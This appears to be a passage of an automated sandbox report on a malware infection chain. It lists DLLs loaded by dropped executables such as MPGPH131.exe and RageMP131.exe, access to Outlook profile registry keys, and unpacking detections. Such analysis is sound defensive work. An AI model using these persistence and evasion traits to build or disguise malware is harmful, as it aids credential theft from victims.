                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: pcacli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: sfc_os.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rstrtmgr.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d11.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxgi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: resourcepolicyclient.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d10warp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxcore.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rstrtmgr.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d11.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxgi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: resourcepolicyclient.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d10warp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxcore.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: rstrtmgr.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: d3d11.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: dxgi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: resourcepolicyclient.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: d3d10warp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: dxcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: devobj.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: webio.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: schannel.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: mskeyprotect.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                Source: BIT1C07.tmp.6.drLNK file: ..\..\Roaming\driverRemote_debug\UniversalInstaller.exe
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                                Source: file.exeStatic file information: File size 1910784 > 1048576
                                Source: file.exeStatic PE information: Raw size of wqkjverv is bigger than: 0x100000 < 0x1a0c00

                                Data Obfuscation

                                barindex
                                Detected unpacking (changes PE section rights)
                                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeUnpacked PE file: 2.2.explorta.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeUnpacked PE file: 3.2.explorta.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeUnpacked PE file: 8.2.2531414c80.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 19.2.MPGPH131.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 20.2.MPGPH131.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeUnpacked PE file: 24.2.2531414c80.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeUnpacked PE file: 26.2.amert.exe.860000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 31.2.RageMP131.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeUnpacked PE file: 37.2.chrosha.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeUnpacked PE file: 42.2.2531414c80.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 43.2.RageMP131.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeUnpacked PE file: 44.2.chrosha.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeUnpacked PE file: 45.2.explorta.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW;
                                Source: BIT1659.tmp.6.drStatic PE information: 0xEC3B20ED [Thu Aug 4 12:07:09 2095 UTC]
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_000D42DE
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
